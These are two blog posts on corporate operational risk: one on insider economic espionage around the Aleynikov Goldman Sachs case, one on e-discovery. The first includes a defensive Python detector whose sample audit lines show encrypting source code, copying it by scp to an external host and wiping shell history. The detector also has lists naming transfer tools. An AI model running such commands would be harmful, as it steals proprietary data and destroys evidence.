23 February 2010

NIS: Homeland Security & Economic Espionage...

The National Intelligence Strategy (NIS) of the United States was published in August of 2009.

The tone at the top of your enterprise will go a long way if you ever end up in litigation associated with the Economic Espionage Act of 1996 or even the Foreign Corrupt Practices Act. As a CxO with the ultimate responsibility for the resilience of your organization, pay attention. The internal threats to your global 500 company and the Operational Risks associated with the following Mission Objectives are the focus of this posting:

  • MO4: Integrate Counterintelligence
  • MO5: Enhance Cybersecurity

The U.S. NIS spells out these two mission objectives for good reason. One reason may be obvious, and we have all heard it before: 80+% of the nation's critical infrastructure is owned and operated by the private sector. The Energy, Financial, and other R&D-heavy sectors are being subjected to more insider attacks because their assets are the most valuable in the eyes of the adversary.

The other reason these two areas are called out in the National Intelligence Strategy is that they are the country's greatest vulnerabilities. So what can a private sector Board of Directors be doing these days to address the two mission objectives that have the greatest nexus with being vigilant and setting the correct "Tone at the Top"?

  • Implement Human Factors Analysis and Risk Assessments on employees, partners, suppliers and 3rd parties.
  • Revitalize, Energize and Capitalize on redesigned policy governance, integrity management and a sound legal framework.
  • Create an aggressive corporate executive intelligence and anti-fraud program that is integrated into a robust risk management ecosystem.
  • Develop wellsprings of knowledge that engage people in a dialogue focused on intellectual property, valuable corporate assets and their nexus with national security.

The preparation for enterprise disasters has been going on in the Operational Risk environment for years. Even in the most sophisticated companies, these efforts have included the implementation of IT related disaster recovery programs and plans (DRP) as mandated by rules and laws regarding Business Continuity and Continuity of Operations. When and how often these are exercised is another matter.

The crisis management plan is sitting on the shelf next to the DRP, or might even be another tab in the same three-ring binder. And who knows, perhaps some Director of BCP has even convinced senior management to adopt an EOC portal. These are all fundamentals, baseline items that every organization should have in place soon after establishing itself in business.

What is still being left out, and not treated as a priority, are the two items highlighted above from the United States National Intelligence Strategy, MO4 and MO5. These two items should be an Operational Risk Management priority for the Board of Directors of every global 500 company. Why?

USAO/Southern District New York, 11 Feb 10: Mr. Aleynikov was indicted today on charges related to his theft of proprietary computer code concerning a high-frequency trading platform from his former employer, Goldman Sachs. Aleynikov was previously arrested and is expected to be arraigned in Manhattan federal court at a later date.

Beginning at approximately 5:20 p.m. on June 5, 2009, Aleynikov's last day working at Goldman Sachs, Aleynikov, from his desk at Goldman Sachs, transferred substantial portions of Goldman Sachs's proprietary computer code for its trading platform to an outside computer server in Germany. Aleynikov encrypted the files and transferred them over the Internet without informing Goldman Sachs. After transferring the files, Aleynikov deleted the program he used to encrypt the files and deleted his computer's "bash history," which records the most recent commands executed on his computer.

In addition, throughout his employment at Goldman Sachs, Aleynikov transferred thousands of computer code files related to the firm’s proprietary trading program from the firm’s computers to his home computers, without the knowledge or authorization of Goldman Sachs. Aleynikov did this by e-mailing the code files from his Goldman Sachs e-mail account to his personal e-mail account, and storing versions of the code files on his home computers, laptop computer, a flash drive, and other storage devices.


The theft of trade secrets, economic espionage, and the movement of data with business implications may also have national security impacts. Whether the data is going to a competitor or into the hands of foreign entities is not the priority issue. Let's be very specific on this point.

If the vital secret, intellectual property or other data is copied rather than taken, how do you know it has left your organization? Nothing is missing. Sensitive, classified or otherwise proprietary information that is copied and then sold or given to competitors, adversaries or our enemies requires a whole new mindset and a whole new approach to deter, detect, defend against and document this behavior in the enterprise.
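As an added example, not part of the original post, here is the "detect" side of that question in working code. The script reads constructed, hypothetical command-audit lines (the `timestamp host= user= cmd=` format, the workstation names, the user names and the addresses are all made up for illustration) and flags any user whose commands, inside a time window, match the sequence the indictment describes: encrypt files, transfer them to a host outside the corporate network, delete the encryption tool, then wipe the shell history. The definition of "internal network" (the 10.x and 192.168.x prefixes and the `.corp.example` suffix) is an assumption and would be replaced with the real one.

```python
"""Toy insider-exfiltration sequence detector over constructed audit lines.

Added example, not from the original post. The log format and all hosts,
users and addresses below are hypothetical / constructed for illustration.
"""
import re
import shlex
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Optional

# Assumption: this is what "inside the corporate network" means here.
INTERNAL_PREFIXES = ("10.", "192.168.", "127.")
INTERNAL_SUFFIXES = (".corp.example",)
ENCRYPT_TOOLS = {"gpg", "openssl", "encrypt"}
TRANSFER_TOOLS = {"scp", "sftp", "rsync", "curl", "wget"}

# Hypothetical audit line: "<ISO timestamp> host=<h> user=<u> cmd=<argv...>"
LINE_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) cmd=(.*)$")
SCP_HOST_RE = re.compile(r"^(?:[\w.-]+@)?([\w.-]+):")      # user@host:path
URL_HOST_RE = re.compile(r"^[a-z]+://(?:[^@/]+@)?([\w.-]+)")  # scheme://host/...

# Constructed sample input: jdoe matches the pattern, asmith is benign.
SAMPLE_LINES = [
    "2009-06-05T17:20:03 host=ws-1142 user=jdoe cmd=tar czf /tmp/src.tgz /home/jdoe/work/platform",
    "2009-06-05T17:21:10 host=ws-1142 user=jdoe cmd=openssl enc -aes-256-cbc -in /tmp/src.tgz -out /tmp/src.tgz.enc",
    "2009-06-05T17:24:41 host=ws-1142 user=jdoe cmd=scp /tmp/src.tgz.enc jdoe@203.0.113.7:/srv/in/",
    "2009-06-05T17:26:02 host=ws-1142 user=jdoe cmd=rm -f /home/jdoe/bin/encrypt /tmp/src.tgz.enc",
    "2009-06-05T17:26:30 host=ws-1142 user=jdoe cmd=rm -f /home/jdoe/.bash_history",
    "2009-06-05T17:30:00 host=ws-2077 user=asmith cmd=scp build.log asmith@10.4.2.15:/var/log/builds/",
    "2009-06-05T17:31:00 host=ws-2077 user=asmith cmd=rm -f /tmp/build.log",
]


def is_external(host: str) -> bool:
    """True if the host is not covered by the (assumed) internal definition."""
    host = host.lower()
    if host == "localhost" or host.startswith(INTERNAL_PREFIXES):
        return False
    return not host.endswith(INTERNAL_SUFFIXES)


def remote_hosts(argv):
    """Hosts named in scp-style targets or URLs among the arguments."""
    hosts = []
    for arg in argv[1:]:
        m = URL_HOST_RE.match(arg) or SCP_HOST_RE.match(arg)
        if m:
            hosts.append(m.group(1))
    return hosts


def classify(argv) -> Optional[str]:
    """Map one command to a stage of the sequence, or None if uninteresting."""
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]
    if tool in ENCRYPT_TOOLS and any(
        a in ("enc", "-c", "--symmetric", "-e", "--encrypt") for a in argv[1:]
    ):
        return "encrypt"
    if tool in TRANSFER_TOOLS and any(is_external(h) for h in remote_hosts(argv)):
        return "exfil"
    if tool in ("rm", "shred", "unlink"):
        if any(a.endswith(".bash_history") for a in argv[1:]):
            return "history_wipe"
        if any(a.rsplit("/", 1)[-1] in ENCRYPT_TOOLS for a in argv[1:]):
            return "tool_cleanup"
    if tool == "history" and "-c" in argv:
        return "history_wipe"
    return None


def parse(line: str):
    """Split one audit line into (timestamp, host, user, argv); None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, host, user, cmd = m.groups()
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    return datetime.fromisoformat(ts), host, user, argv


def detect(lines, window: timedelta = timedelta(hours=2)):
    """Flag users with encrypt -> external transfer -> history wipe inside `window`."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, host, user, argv = parsed
        stage = classify(argv)
        if stage:
            events[user].append((ts, stage, host, " ".join(argv)))
    findings = []
    for user, evs in events.items():
        evs.sort()
        for i, (t_exfil, stage, host, cmd) in enumerate(evs):
            if stage != "exfil":
                continue
            before = [e for e in evs[:i] if t_exfil - e[0] <= window]
            after = [e for e in evs[i + 1:] if e[0] - t_exfil <= window]
            if any(e[1] == "encrypt" for e in before) and any(e[1] == "history_wipe" for e in after):
                findings.append({
                    "user": user,
                    "host": host,
                    "exfil_at": t_exfil.isoformat(),
                    "exfil_cmd": cmd,
                    "stages": [e[1] for e in before + [evs[i]] + after],
                })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LINES):
        print(f"{f['user']}@{f['host']} {f['exfil_at']} {f['stages']}: {f['exfil_cmd']}")
```

The caveat a practitioner will spot immediately is the one the indictment itself illustrates: the local `.bash_history` was deleted, so a detector that reads it from the workstation after the fact has nothing to read. Logic like this is only worth anything if the command records are captured as they happen and shipped to a system the user cannot reach, and if the "external host" test reflects the network as it actually is rather than as the diagram says it is.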

Aleynikov, 40, is charged with one count of theft of trade secrets, one count of transportation of stolen property in foreign commerce, and one count of unauthorized computer access. If convicted on these charges, Aleynikov faces a maximum sentence of 25 years in prison.

A competitive intelligence case, where intellectual property is transferred to another U.S. company, may be just as harmful to the economic fabric of our country. What is more alarming, and perhaps the final questions on Operational Risk Management, are these:

  1. What do we know?
  2. When did we know it?
  3. What are we going to do about it?

The Board of Directors will be asking these as the crisis is unfolding. The law enforcement investigators will be asking these soon after the immediate incident. The final, and perhaps the most painful, of all the people who will be asking these questions are the lawyers during your deposition and in the courtroom. Those questions and more will be asked from the front lines of the Goldman Sachs trading-floor battlefield to the highly polished tables inside the corporate Board Room.

Revisit the Mission Objectives (MO) in your organization that pertain to MO4 and MO5. It may mean the difference to your corporate shareholders, or to all the citizens of the United States of America.

05 February 2010

Legal Risk: Early Case Assessment...

After a few days at LegalTech New York this week, it's now confirmed that only a very small percentage of small to medium enterprises (SMEs) are truly ready for the Operational Risk of litigation. How can a General Counsel achieve a defensible standard of care in this vast sea of software, technology and vendors that are trying to address the modern-day business problem called "Electronically Stored Information" (ESI)?

Yet the likes of Bank of America and the Attorney General of New York are well aware of the importance of the "Meet-and-Confer" process as the allegations of fraud look for the "Digital Smoking Gun". Let the metadata wars begin:

Legal action has begun against Bank of America and its former bosses, accusing them of duping investors and taxpayers during the takeover of Merrill Lynch.

The defendants are accused of intentionally withholding details of huge losses Merrill was suffering.

New York state officials have filed the action against the bank, former chief executive Kenneth Lewis and former chief financial officer Joseph Price.


Principle 12 of the Sedona Principles states: Absent party agreement or court order specifying the form or forms of production, production should be made in the form or forms in which the information is ordinarily maintained or in a reasonably usable form, taking into account the need to produce reasonably accessible metadata that will enable the receiving party to have the same ability to access, search, and display the information as the producing party where appropriate or necessary in light of the nature of the information and the needs of the case. Sedona Principles 2d Principle 12

The issues faced by legal counsel at large Fortune 50 organizations are no different from those of the Small to Medium Enterprise when it comes to the "Meet-and-Confer." Deciding what is relevant and what the scope of eDiscovery should be is increasingly about the economics of litigation. Law firms are trying to reduce their costs and the impact of billable hours on their clients, and General Counsels are making sure that internal IT records management tasks are a top priority.

What many vendors at LegalTech are advocating, in both process and tools, is the idea of Early Case Assessment (ECA). In other words, the Plaintiff is going to have to show their hand early and without sleight of hand. This interview with the Hon. James Holderman explains:

Editor: Doesn't that pretty much move in the direction of requiring the plaintiff to provide specific facts about the basis for the complaint? How can the discoverable "ESI" to be preserved and produced be determined unless the plaintiff comes forward with the specific facts on which its case is based?

Holderman: It cannot be done, and that is why the plaintiff needs to cooperate by divulging that information at the outset. Hiding the ball is a concept from the last century that can't be a part of present-day litigation. This is reflected in the Supreme Court's decisions in Iqbal and Twombly. Discovery is expensive and let's get the information out early. What is the benefit of bare-bones pleadings when the expense of e-discovery is so great? If the plaintiff has information then let's see whether the plaintiff has a sufficient basis for going forward to withstand a motion for summary judgment.


Where is the information you seek? In more places than you may realize, once the investigation, forensic collection and rules of evidence are engaged. The risk of sanctions is real. The analysis of custodians' BlackBerry e-mails, BBMs and plain text messages will be overwhelming as the Attorney General builds the case for fraud. The US Treasury, Federal Reserve and other government agencies will also be producing terabytes of data for the inquiry.

Regardless of the approaches taken by the General Counsels at Bank of America or Merrill, the key risk items they should have been addressing with outside counsel long before this trial include the following topics, again from LegalTech:

  • Cloud-based email and records management provides a new approach for cost-effectively managing law firm content
  • Securely archive information assets and maintain compliance with all regulatory standards, including the FRCP
  • Meaning Based Computing to enable automatic categorization of ESI for the application of retention policies
  • Sophisticated retention policies that enable non-critical data to be purged appropriately
  • The ability to easily and transparently retrieve archived data, prepare the data for potential future legal holds or preservation, and to rapidly respond to a litigation and investigation pertaining to the firm
  • How has legal changed the way we think about back-up?
  • What does "inaccessible" mean in discovery?
  • How can you implement a reasonable, defensible information management strategy that reduces risk?

As a law firm you always have to look at the fine print. B of A's procedures for outside counsel are available for review online:

These Procedures shall constitute the written engagement, or contract, of the firm for any matter for which it is engaged on behalf of Bank of America, and shall govern the terms of the engagement. These Procedures are applicable to all law firms and attorneys providing legal services to Bank of America. Law firms retained by Bank of America should ensure that a copy of these Procedures is provided to all attorneys, paralegals, administrative, clerical or other assistants assigned to a particular matter before work begins on any matter.